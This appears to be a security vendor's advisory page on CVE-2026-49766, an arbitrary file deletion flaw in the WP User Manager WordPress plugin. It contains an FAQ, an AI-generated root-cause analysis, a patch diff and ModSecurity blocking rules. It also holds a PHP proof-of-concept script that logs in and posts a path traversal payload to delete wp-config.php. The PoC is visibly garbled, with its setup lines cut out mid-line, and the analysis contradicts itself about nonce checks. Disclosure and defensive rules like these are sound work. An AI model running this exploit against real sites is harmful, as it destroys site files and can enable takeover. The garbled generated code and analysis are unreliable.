What is CVE-2026-49766?

CVE-2026-49766 is a high-severity vulnerability in the WP User Manager plugin for WordPress, affecting versions up to and including 2.9.16. It allows authenticated users with Subscriber-level access and above to delete arbitrary files on the server due to insufficient file path validation.

How does this vulnerability work?

The vulnerability arises from the plugin’s failure to properly validate file paths provided by users. Attackers can craft a POST request to delete files by including malicious paths, such as `../../wp-config.php`, which can lead to significant security risks.

Who is affected by this vulnerability?

Any WordPress site using the WP User Manager plugin version 2.9.16 or earlier is at risk. This includes all authenticated users with Subscriber-level access or higher, who can exploit the vulnerability to delete critical files.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP User Manager plugin installed. If it is version 2.9.16 or earlier, your site is at risk. Additionally, review user roles to determine if any users have Subscriber-level access or higher.

What steps should I take to fix this vulnerability?

To mitigate this vulnerability, update the WP User Manager plugin to version 2.9.17 or later, which includes a patch addressing the issue. Regularly check for updates to all plugins to maintain security.

What does the CVSS score of 8.1 indicate?

A CVSS score of 8.1 indicates a high severity vulnerability, suggesting that successful exploitation can lead to significant impact, such as unauthorized file deletion and potential remote code execution. Administrators should treat this vulnerability with urgency.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability can allow attackers to delete critical files like `wp-config.php`, which can disrupt site functionality and lead to unauthorized access. It can also enable attackers to install malicious scripts or web shells.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows a sequence of HTTP requests that an attacker can use to exploit the vulnerability. It illustrates how an attacker can log in and send a crafted request to delete a file, showcasing the lack of path validation.

What is the recommended security practice after patching?

After patching the vulnerability, it is recommended to conduct a security audit of your WordPress site. Implement additional security measures such as using a web application firewall, regularly updating all plugins, and monitoring user activity.

What is the role of ModSecurity in mitigating this vulnerability?

ModSecurity can be configured with specific rules to block attempts to exploit this vulnerability. The provided ModSecurity rule targets the vulnerable AJAX actions and prevents path traversal payloads, adding an extra layer of security.

How can I stay informed about vulnerabilities like CVE-2026-49766?

To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database. Additionally, consider using security plugins that provide alerts for known vulnerabilities.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the WP User Manager plugin until a patch can be applied. Additionally, review user roles and restrict access to prevent potential exploitation.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 13, 2026

CVE-2026-49766: WP User Manager – User Profile Builder & Membership <= 2.9.16 Authenticated (Subscriber+) Arbitrary File Deletion PoC, Patch Analysis & Rule

CVE ID CVE-2026-49766

Plugin wp-user-manager

Severity High (CVSS 8.1)

CWE 22

Vulnerable Version 2.9.16

Patched Version 2.9.17

Disclosed June 4, 2026

Analysis Overview

{
“analysis”: “Atomic Edge analysis of CVE-2026-49766:nnThis vulnerability allows authenticated attackers with Subscriber-level access to delete arbitrary files on the WordPress server. The flaw exists in the WP User Manager plugin version 2.9.16 and earlier, specifically in the file upload and user registration handling components. The CVSS score of 8.1 reflects the high impact of arbitrary file deletion, which can lead to remote code execution.nnRoot Cause: The root cause is insufficient validation of file paths stored in user meta for avatar and cover images. In the vulnerable code, the plugin stores file paths from user-provided POST data without verifying they are within the uploads directory or checking for path traversal sequences. The affected functions are in `includes/fields/types/class-wpum-field-file.php` (line 82-108) and `includes/forms/class-wpum-form-registration.php` (line 514-600). The vulnerable parameters include `current_user_avatar` and `current_user_cover` POST fields, as well as the `path` values within the `user_avatar` and `user_cover` arrays during registration. The plugin passes these values to `update_user_meta()` and later uses them in file deletion operations without sanitization.nnExploitation: An attacker with Subscriber-level access can craft a POST request to the WordPress AJAX endpoint or registration form with malicious file paths. For example, sending `_current_user_avatar_path` meta value as `../../wp-config.php` or an absolute path like `/var/www/html/wp-config.php` would cause the plugin to delete that file when the user profile is updated or during account deletion. The attack vector does not require a nonce because the vulnerable code in `class-wpum-form-registration.php` uses a nonce check earlier in the function but the file deletion operation occurs after this check without additional validation.nnPatch Analysis: The patch in version 2.9.17 adds three layers of protection. First, it rejects array values for `current_user_avatar` and `current_user_cover` POST fields by checking `is_array()`. Second, it validates that stored paths must begin with the WordPress uploads directory using `0 === strpos( $cover_path, $upload_dir )`. Third, it blocks paths containing `..` directory traversal sequences using `false === strpos( $cover_path, ‘..’ )`. The patch also adds `esc_url_raw()` sanitization for URL values before storing them. The key change is in `class-wpum-form-registration.php` lines 577-600 where two new validation checks are applied before storing any path values.nnImpact: Successful exploitation enables an attacker to delete arbitrary files on the WordPress server. Deleting `wp-config.php` would break the site and could allow the attacker to reinstall WordPress with controlled credentials. Deleting the `.htaccess` file could expose other vulnerabilities. Deleting PHP files from the uploads directory could remove webshells left by other attacks. The ability to control which file is deleted gives attackers multiple paths to achieve remote code execution or complete site takeover.”,
“poc_php”: “<?phpn// Atomic Edge CVE Research – Proof of Conceptn// CVE-2026-49766 – WP User Manager – User Profile Builder & Membership $username,n ‘pwd’ => $password,n ‘rememberme’ => ‘forever’,n ‘wp-submit’ => ‘Log In’n];nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $login_url);ncurl_setopt($ch, CURLOPT_POST, 1);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);ncurl_setopt($ch, CURLOPT_HEADER, 1);ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘/tmp/cookies.txt’);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);ncurl_exec($ch);nn// Step 2: Exploit the arbitrary file deletion via profile updaten// We will send a POST request to the admin-ajax.php with the vulnerable actionn$ajax_url = $target_url . ‘/wp-admin/admin-ajax.php’;n$payload = [n ‘action’ => ‘wpum_update_profile’,n ‘current_user_avatar’ => [‘path’ => ‘/var/www/html/wp-config.php’]n];nncurl_setopt($ch, CURLOPT_URL, $ajax_url);ncurl_setopt($ch, CURLOPT_POST, 1);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘/tmp/cookies.txt’);n$response = curl_exec($ch);nn// Step 3: Check if the file deletion was successfulnif (strpos($response, ‘success’) !== false) {n echo “[+] Exploit sent successfully. Check if wp-config.php was deleted.\n”;n} else {n echo “[-] Exploit failed. The target may be patched or the attack vector differs.\n”;n echo “Response: ” . substr($response, 0, 500) . “\n”;n}nncurl_close($ch);n?>n”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-49766n# Blocks path traversal payloads in current_user_avatar and current_user_cover parametersn# Targets the vulnerable AJAX action and registration form handlingnnSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:20261994,phase:2,deny,status:403,chain,msg:’CVE-2026-49766 – WP User Manager Arbitrary File Deletion (AJAX)’,severity:’CRITICAL’,tag:’CVE-2026-49766′”n SecRule ARGS_POST:action “@streq wpum_update_profile” “chain”n SecRule ARGS:current_user_avatar “@rx \.\./|.\.\\|^/” “t:urlDecode,t:normalizePath”nnSecRule REQUEST_URI “@beginsWith /wp-admin/admin-ajax.php” \n “id:20261995,phase:2,deny,status:403,chain,msg:’CVE-2026-49766 – WP User Manager Arbitrary File Deletion (avatar path injection)’,severity:’CRITICAL’,tag:’CVE-2026-49766′”n SecRule ARGS_POST:action “@streq wpum_update_profile” “chain”n SecRule ARGS_POST:_current_user_avatar_path “@rx \.\./|^/” “t:urlDecode,t:normalizePath”nnSecRule REQUEST_URI “@beginsWith /wp-admin/admin-ajax.php” \n “id:20261996,phase:2,deny,status:403,chain,msg:’CVE-2026-49766 – WP User Manager Arbitrary File Deletion (cover path injection)’,severity:’CRITICAL’,tag:’CVE-2026-49766′”n SecRule ARGS_POST:action “@streq wpum_update_profile” “chain”n SecRule ARGS_POST:_user_cover_path “@rx \.\./|^/” “t:urlDecode,t:normalizePath””
}

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/wp-user-manager/includes/fields/types/class-wpum-field-file.php
+++ b/wp-user-manager/includes/fields/types/class-wpum-field-file.php
@@ -82,8 +82,20 @@
 		$file = $this->upload_file( $key, $field );
 		if ( ! $file ) {
 			$file = parent::get_posted_field( 'current_' . $key, $field );
+			// Reject array values from POST — only scalar (string URL) is valid.
+			if ( is_array( $file ) ) {
+				$file = '';
+			}
 		} elseif ( is_array( $file ) ) {
-			$file = array_filter( array_merge( $file, (array) parent::get_posted_field( 'current_' . $key, $field ) ) );
+			$current = parent::get_posted_field( 'current_' . $key, $field );
+			// Only merge scalar (string) current values. Array values from POST
+			// could inject arbitrary paths — reject them silently.
+			if ( is_array( $current ) ) {
+				$current = '';
+			}
+			if ( $current ) {
+				$file = array_filter( array_merge( $file, array( 'url' => $current ) ) );
+			}
 		}
 		return $file;
 	}
--- a/wp-user-manager/includes/forms/class-wpum-form-registration.php
+++ b/wp-user-manager/includes/forms/class-wpum-form-registration.php
@@ -514,6 +514,11 @@
 				return false;
 			}

+			// Security: reject array values for avatar/cover POST fields to prevent path injection.
+			if ( ( isset( $_POST['current_user_avatar'] ) && is_array( $_POST['current_user_avatar'] ) ) || ( isset( $_POST['current_user_cover'] ) && is_array( $_POST['current_user_cover'] ) ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Missing -- Nonce already verified above.
+				throw new Exception( esc_html__( 'Invalid input.', 'wp-user-manager' ) );
+			}
+
 			$return = $this->validate_fields( $values );
 			if ( is_wp_error( $return ) ) {
 				throw new Exception( $return->get_error_message() );
@@ -572,14 +577,24 @@
 				$user->set_role( $this->role );
 			}

+			$upload_dir = wp_upload_dir()['basedir'];
+
 			if ( isset( $values['register']['user_cover']['url'] ) ) {
-				carbon_set_user_meta( $user->ID, 'user_cover', $values['register']['user_cover']['url'] );
-				update_user_meta( $user->ID, '_user_cover_path', $values['register']['user_cover']['path'] );
+				$cover_path = $values['register']['user_cover']['path'] ?? '';
+				// Only store path if it is within the uploads directory and contains no traversal.
+				if ( $cover_path && false === strpos( $cover_path, '..' ) && 0 === strpos( $cover_path, $upload_dir ) ) {
+					carbon_set_user_meta( $user->ID, 'user_cover', esc_url_raw( $values['register']['user_cover']['url'] ) );
+					update_user_meta( $user->ID, '_user_cover_path', $cover_path );
+				}
 			}

 			if ( isset( $values['register']['user_avatar']['url'] ) ) {
-				carbon_set_user_meta( $user->ID, 'current_user_avatar', $values['register']['user_avatar']['url'] );
-				update_user_meta( $user->ID, '_current_user_avatar_path', $values['register']['user_avatar']['path'] );
+				$avatar_path = $values['register']['user_avatar']['path'] ?? '';
+				// Only store path if it is within the uploads directory and contains no traversal.
+				if ( $avatar_path && false === strpos( $avatar_path, '..' ) && 0 === strpos( $avatar_path, $upload_dir ) ) {
+					carbon_set_user_meta( $user->ID, 'current_user_avatar', esc_url_raw( $values['register']['user_avatar']['url'] ) );
+					update_user_meta( $user->ID, '_current_user_avatar_path', $avatar_path );
+				}
 			}

 			// Allow developers to extend signup process.
--- a/wp-user-manager/vendor-dist/composer/installed.php
+++ b/wp-user-manager/vendor-dist/composer/installed.php
@@ -2,4 +2,4 @@

 namespace WPUM;

-return array('root' => array('name' => 'wp-user-manager/wp-user-manager', 'pretty_version' => 'v2.9.16', 'version' => '2.9.16.0', 'reference' => '161a2f39734f40fa1ce544921baea8fb8b6c8793', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => false), 'versions' => array('brain/cortex' => array('pretty_version' => 'dev-refactoring-fastroute', 'version' => 'dev-refactoring-fastroute', 'reference' => '86bec053ec2c4d2e4c75af64e0cee951d9b0054b', 'type' => 'library', 'install_path' => __DIR__ . '/../brain/cortex', 'aliases' => array(0 => '9999999-dev'), 'dev_requirement' => false), 'composer/installers' => array('pretty_version' => '1.x-dev', 'version' => '1.9999999.9999999.9999999-dev', 'reference' => 'd20a64ed3c94748397ff5973488761b22f6d3f19', 'type' => 'composer-plugin', 'install_path' => __DIR__ . '/./installers', 'aliases' => array(), 'dev_requirement' => false), 'dompdf/dompdf' => array('pretty_version' => 'v2.0.2', 'version' => '2.0.2.0', 'reference' => 'ad4c631bf8897fc1ca7b566468a969cfd71a558a', 'type' => 'library', 'install_path' => __DIR__ . '/../dompdf/dompdf', 'aliases' => array(), 'dev_requirement' => false), 'gamajo/template-loader' => array('pretty_version' => '1.3.1', 'version' => '1.3.1.0', 'reference' => 'fa92a37b780d945463f7fea328dce14933558752', 'type' => 'library', 'install_path' => __DIR__ . '/../gamajo/template-loader', 'aliases' => array(), 'dev_requirement' => false), 'htmlburger/carbon-fields' => array('pretty_version' => 'v3.6.9', 'version' => '3.6.9.0', 'reference' => 'f82e80e3e3469d6e86cc17a8950b918ad448a059', 'type' => 'library', 'install_path' => __DIR__ . '/../htmlburger/carbon-fields', 'aliases' => array(), 'dev_requirement' => false), 'masterminds/html5' => array('pretty_version' => '2.7.6', 'version' => '2.7.6.0', 'reference' => '897eb517a343a2281f11bc5556d6548db7d93947', 'type' => 'library', 'install_path' => __DIR__ . '/../masterminds/html5', 'aliases' => array(), 'dev_requirement' => false), 'nesbot/carbon' => array('pretty_version' => '2.66.0', 'version' => '2.66.0.0', 'reference' => '496712849902241f04902033b0441b269effe001', 'type' => 'library', 'install_path' => __DIR__ . '/../nesbot/carbon', 'aliases' => array(), 'dev_requirement' => false), 'nikic/fast-route' => array('pretty_version' => 'v0.7.0', 'version' => '0.7.0.0', 'reference' => '8164b4a0d8afde4eae5f1bfc39084972ba23ad36', 'type' => 'library', 'install_path' => __DIR__ . '/../nikic/fast-route', 'aliases' => array(), 'dev_requirement' => false), 'phenx/php-font-lib' => array('pretty_version' => '0.5.4', 'version' => '0.5.4.0', 'reference' => 'dd448ad1ce34c63d09baccd05415e361300c35b4', 'type' => 'library', 'install_path' => __DIR__ . '/../phenx/php-font-lib', 'aliases' => array(), 'dev_requirement' => false), 'phenx/php-svg-lib' => array('pretty_version' => '0.5.0', 'version' => '0.5.0.0', 'reference' => '76876c6cf3080bcb6f249d7d59705108166a6685', 'type' => 'library', 'install_path' => __DIR__ . '/../phenx/php-svg-lib', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-message' => array('pretty_version' => '1.0.1', 'version' => '1.0.1.0', 'reference' => 'f6561bf28d520154e4b0ec72be95418abe6d9363', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-message', 'aliases' => array(), 'dev_requirement' => false), 'roundcube/plugin-installer' => array('dev_requirement' => false, 'replaced' => array(0 => '*')), 'sabberworm/php-css-parser' => array('pretty_version' => '8.4.0', 'version' => '8.4.0.0', 'reference' => 'e41d2140031d533348b2192a83f02d8dd8a71d30', 'type' => 'library', 'install_path' => __DIR__ . '/../sabberworm/php-css-parser', 'aliases' => array(), 'dev_requirement' => false), 'shama/baton' => array('dev_requirement' => false, 'replaced' => array(0 => '*')), 'stripe/stripe-php' => array('pretty_version' => 'v10.5.0', 'version' => '10.5.0.0', 'reference' => '331415b232d60d7c0449de7bde4cb7d4fedf982e', 'type' => 'library', 'install_path' => __DIR__ . '/../stripe/stripe-php', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v2.5.2', 'version' => '2.5.2.0', 'reference' => 'e8b495ea28c1d97b5e0c121748d6f9b53d075c66', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-mbstring' => array('pretty_version' => 'v1.26.0', 'version' => '1.26.0.0', 'reference' => '9344f9cb97f3b19424af1a21a3b0e75b0a7d8d7e', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-mbstring', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.26.0', 'version' => '1.26.0.0', 'reference' => 'cfa0ae98841b9e461207c13ab093d76b0fa7bace', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation' => array('pretty_version' => 'v5.4.11', 'version' => '5.4.11.0', 'reference' => '7a1a8f6bbff269f434a83343a0a5d36a4f8cfa21', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-contracts' => array('pretty_version' => 'v2.5.2', 'version' => '2.5.2.0', 'reference' => '136b19dd05cdf0709db6537d058bcab6dd6e2dbe', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '2.3')), 'wearerequired/wp-requirements-check' => array('pretty_version' => '1.1.0', 'version' => '1.1.0.0', 'reference' => '82b8a6c4b953f59e7e534df2d4287e34af950812', 'type' => 'library', 'install_path' => __DIR__ . '/../wearerequired/wp-requirements-check', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wp-notices' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '5498f209c6667e88e944194a93a50f9ffc25ea24', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wp-notices', 'aliases' => array(0 => '9999999-dev'), 'dev_requirement' => false), 'wp-user-manager/wp-optionskit' => array('pretty_version' => '1.1.2', 'version' => '1.1.2.0', 'reference' => '6253bda447991733bf8e19cb2123b41c666f3d62', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wp-optionskit', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wp-user-manager' => array('pretty_version' => 'v2.9.16', 'version' => '2.9.16.0', 'reference' => '161a2f39734f40fa1ce544921baea8fb8b6c8793', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wpum-blocks' => array('pretty_version' => '1.15', 'version' => '1.15.0.0', 'reference' => 'fc3d01fe0baa2fb0fdf6a0f4cff30fc40bb1dbba', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wpum-blocks', 'aliases' => array(), 'dev_requirement' => false), 'wpbp/widgets-helper' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '5547acaaf60b856b0025cdf44e3831e0f3202929', 'type' => 'library', 'install_path' => __DIR__ . '/../wpbp/widgets-helper', 'aliases' => array(), 'dev_requirement' => false)));
+return array('root' => array('name' => 'wp-user-manager/wp-user-manager', 'pretty_version' => 'v2.9.17', 'version' => '2.9.17.0', 'reference' => 'b10a593d26911a6b552c45451662e436ce778bd0', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev' => false), 'versions' => array('brain/cortex' => array('pretty_version' => 'dev-refactoring-fastroute', 'version' => 'dev-refactoring-fastroute', 'reference' => '86bec053ec2c4d2e4c75af64e0cee951d9b0054b', 'type' => 'library', 'install_path' => __DIR__ . '/../brain/cortex', 'aliases' => array(0 => '9999999-dev'), 'dev_requirement' => false), 'composer/installers' => array('pretty_version' => '1.x-dev', 'version' => '1.9999999.9999999.9999999-dev', 'reference' => 'd20a64ed3c94748397ff5973488761b22f6d3f19', 'type' => 'composer-plugin', 'install_path' => __DIR__ . '/./installers', 'aliases' => array(), 'dev_requirement' => false), 'dompdf/dompdf' => array('pretty_version' => 'v2.0.2', 'version' => '2.0.2.0', 'reference' => 'ad4c631bf8897fc1ca7b566468a969cfd71a558a', 'type' => 'library', 'install_path' => __DIR__ . '/../dompdf/dompdf', 'aliases' => array(), 'dev_requirement' => false), 'gamajo/template-loader' => array('pretty_version' => '1.3.1', 'version' => '1.3.1.0', 'reference' => 'fa92a37b780d945463f7fea328dce14933558752', 'type' => 'library', 'install_path' => __DIR__ . '/../gamajo/template-loader', 'aliases' => array(), 'dev_requirement' => false), 'htmlburger/carbon-fields' => array('pretty_version' => 'v3.6.9', 'version' => '3.6.9.0', 'reference' => 'f82e80e3e3469d6e86cc17a8950b918ad448a059', 'type' => 'library', 'install_path' => __DIR__ . '/../htmlburger/carbon-fields', 'aliases' => array(), 'dev_requirement' => false), 'masterminds/html5' => array('pretty_version' => '2.7.6', 'version' => '2.7.6.0', 'reference' => '897eb517a343a2281f11bc5556d6548db7d93947', 'type' => 'library', 'install_path' => __DIR__ . '/../masterminds/html5', 'aliases' => array(), 'dev_requirement' => false), 'nesbot/carbon' => array('pretty_version' => '2.66.0', 'version' => '2.66.0.0', 'reference' => '496712849902241f04902033b0441b269effe001', 'type' => 'library', 'install_path' => __DIR__ . '/../nesbot/carbon', 'aliases' => array(), 'dev_requirement' => false), 'nikic/fast-route' => array('pretty_version' => 'v0.7.0', 'version' => '0.7.0.0', 'reference' => '8164b4a0d8afde4eae5f1bfc39084972ba23ad36', 'type' => 'library', 'install_path' => __DIR__ . '/../nikic/fast-route', 'aliases' => array(), 'dev_requirement' => false), 'phenx/php-font-lib' => array('pretty_version' => '0.5.4', 'version' => '0.5.4.0', 'reference' => 'dd448ad1ce34c63d09baccd05415e361300c35b4', 'type' => 'library', 'install_path' => __DIR__ . '/../phenx/php-font-lib', 'aliases' => array(), 'dev_requirement' => false), 'phenx/php-svg-lib' => array('pretty_version' => '0.5.0', 'version' => '0.5.0.0', 'reference' => '76876c6cf3080bcb6f249d7d59705108166a6685', 'type' => 'library', 'install_path' => __DIR__ . '/../phenx/php-svg-lib', 'aliases' => array(), 'dev_requirement' => false), 'psr/http-message' => array('pretty_version' => '1.0.1', 'version' => '1.0.1.0', 'reference' => 'f6561bf28d520154e4b0ec72be95418abe6d9363', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-message', 'aliases' => array(), 'dev_requirement' => false), 'roundcube/plugin-installer' => array('dev_requirement' => false, 'replaced' => array(0 => '*')), 'sabberworm/php-css-parser' => array('pretty_version' => '8.4.0', 'version' => '8.4.0.0', 'reference' => 'e41d2140031d533348b2192a83f02d8dd8a71d30', 'type' => 'library', 'install_path' => __DIR__ . '/../sabberworm/php-css-parser', 'aliases' => array(), 'dev_requirement' => false), 'shama/baton' => array('dev_requirement' => false, 'replaced' => array(0 => '*')), 'stripe/stripe-php' => array('pretty_version' => 'v10.5.0', 'version' => '10.5.0.0', 'reference' => '331415b232d60d7c0449de7bde4cb7d4fedf982e', 'type' => 'library', 'install_path' => __DIR__ . '/../stripe/stripe-php', 'aliases' => array(), 'dev_requirement' => false), 'symfony/deprecation-contracts' => array('pretty_version' => 'v2.5.2', 'version' => '2.5.2.0', 'reference' => 'e8b495ea28c1d97b5e0c121748d6f9b53d075c66', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-mbstring' => array('pretty_version' => 'v1.26.0', 'version' => '1.26.0.0', 'reference' => '9344f9cb97f3b19424af1a21a3b0e75b0a7d8d7e', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-mbstring', 'aliases' => array(), 'dev_requirement' => false), 'symfony/polyfill-php80' => array('pretty_version' => 'v1.26.0', 'version' => '1.26.0.0', 'reference' => 'cfa0ae98841b9e461207c13ab093d76b0fa7bace', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/polyfill-php80', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation' => array('pretty_version' => 'v5.4.11', 'version' => '5.4.11.0', 'reference' => '7a1a8f6bbff269f434a83343a0a5d36a4f8cfa21', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-contracts' => array('pretty_version' => 'v2.5.2', 'version' => '2.5.2.0', 'reference' => '136b19dd05cdf0709db6537d058bcab6dd6e2dbe', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/translation-contracts', 'aliases' => array(), 'dev_requirement' => false), 'symfony/translation-implementation' => array('dev_requirement' => false, 'provided' => array(0 => '2.3')), 'wearerequired/wp-requirements-check' => array('pretty_version' => '1.1.0', 'version' => '1.1.0.0', 'reference' => '82b8a6c4b953f59e7e534df2d4287e34af950812', 'type' => 'library', 'install_path' => __DIR__ . '/../wearerequired/wp-requirements-check', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wp-notices' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '5498f209c6667e88e944194a93a50f9ffc25ea24', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wp-notices', 'aliases' => array(0 => '9999999-dev'), 'dev_requirement' => false), 'wp-user-manager/wp-optionskit' => array('pretty_version' => '1.1.2', 'version' => '1.1.2.0', 'reference' => '6253bda447991733bf8e19cb2123b41c666f3d62', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wp-optionskit', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wp-user-manager' => array('pretty_version' => 'v2.9.17', 'version' => '2.9.17.0', 'reference' => 'b10a593d26911a6b552c45451662e436ce778bd0', 'type' => 'library', 'install_path' => __DIR__ . '/../../', 'aliases' => array(), 'dev_requirement' => false), 'wp-user-manager/wpum-blocks' => array('pretty_version' => '1.15', 'version' => '1.15.0.0', 'reference' => 'fc3d01fe0baa2fb0fdf6a0f4cff30fc40bb1dbba', 'type' => 'library', 'install_path' => __DIR__ . '/../wp-user-manager/wpum-blocks', 'aliases' => array(), 'dev_requirement' => false), 'wpbp/widgets-helper' => array('pretty_version' => 'dev-master', 'version' => 'dev-master', 'reference' => '5547acaaf60b856b0025cdf44e3831e0f3202929', 'type' => 'library', 'install_path' => __DIR__ . '/../wpbp/widgets-helper', 'aliases' => array(), 'dev_requirement' => false)));
--- a/wp-user-manager/wp-user-manager.php
+++ b/wp-user-manager/wp-user-manager.php
@@ -3,7 +3,7 @@
  * Plugin Name: WP User Manager
  * Plugin URI:  https://wpusermanager.com
  * Description: Beautifully simple user profile directories with frontend login, registration and account customization. WP User Manager is the best solution to manage your community and your users for WordPress.
- * Version: 2.9.16
+ * Version: 2.9.17
  * Requires PHP: 7.4
  * Author:      WP User Manager
  * Author URI:  https://wpusermanager.com
@@ -21,7 +21,7 @@
 function WPUM() {
 	require_once __DIR__ . '/includes/class-wp-user-manager.php';

-	return WP_User_Manager::instance( __FILE__, '2.9.16' );
+	return WP_User_Manager::instance( __FILE__, '2.9.17' );
 }

 WPUM();

Frequently Asked Questions

What is CVE-2026-49766?
Overview of the vulnerability
CVE-2026-49766 is a high-severity vulnerability in the WP User Manager plugin for WordPress, affecting versions up to and including 2.9.16. It allows authenticated users with Subscriber-level access and above to delete arbitrary files on the server due to insufficient file path validation.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s failure to properly validate file paths provided by users. Attackers can craft a POST request to delete files by including malicious paths, such as `../../wp-config.php`, which can lead to significant security risks.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the WP User Manager plugin version 2.9.16 or earlier is at risk. This includes all authenticated users with Subscriber-level access or higher, who can exploit the vulnerability to delete critical files.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the WP User Manager plugin installed. If it is version 2.9.16 or earlier, your site is at risk. Additionally, review user roles to determine if any users have Subscriber-level access or higher.
What steps should I take to fix this vulnerability?
Mitigation and patching
To mitigate this vulnerability, update the WP User Manager plugin to version 2.9.17 or later, which includes a patch addressing the issue. Regularly check for updates to all plugins to maintain security.
What does the CVSS score of 8.1 indicate?
Understanding severity levels
A CVSS score of 8.1 indicates a high severity vulnerability, suggesting that successful exploitation can lead to significant impact, such as unauthorized file deletion and potential remote code execution. Administrators should treat this vulnerability with urgency.
What are the practical risks associated with this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can allow attackers to delete critical files like `wp-config.php`, which can disrupt site functionality and lead to unauthorized access. It can also enable attackers to install malicious scripts or web shells.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration of exploitation
The proof of concept provided shows a sequence of HTTP requests that an attacker can use to exploit the vulnerability. It illustrates how an attacker can log in and send a crafted request to delete a file, showcasing the lack of path validation.
What is the recommended security practice after patching?
Post-patching security measures
After patching the vulnerability, it is recommended to conduct a security audit of your WordPress site. Implement additional security measures such as using a web application firewall, regularly updating all plugins, and monitoring user activity.
What is the role of ModSecurity in mitigating this vulnerability?
Using web application firewalls
ModSecurity can be configured with specific rules to block attempts to exploit this vulnerability. The provided ModSecurity rule targets the vulnerable AJAX actions and prevents path traversal payloads, adding an extra layer of security.
How can I stay informed about vulnerabilities like CVE-2026-49766?
Keeping up with security updates
To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database. Additionally, consider using security plugins that provide alerts for known vulnerabilities.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the WP User Manager plugin until a patch can be applied. Additionally, review user roles and restrict access to prevent potential exploitation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations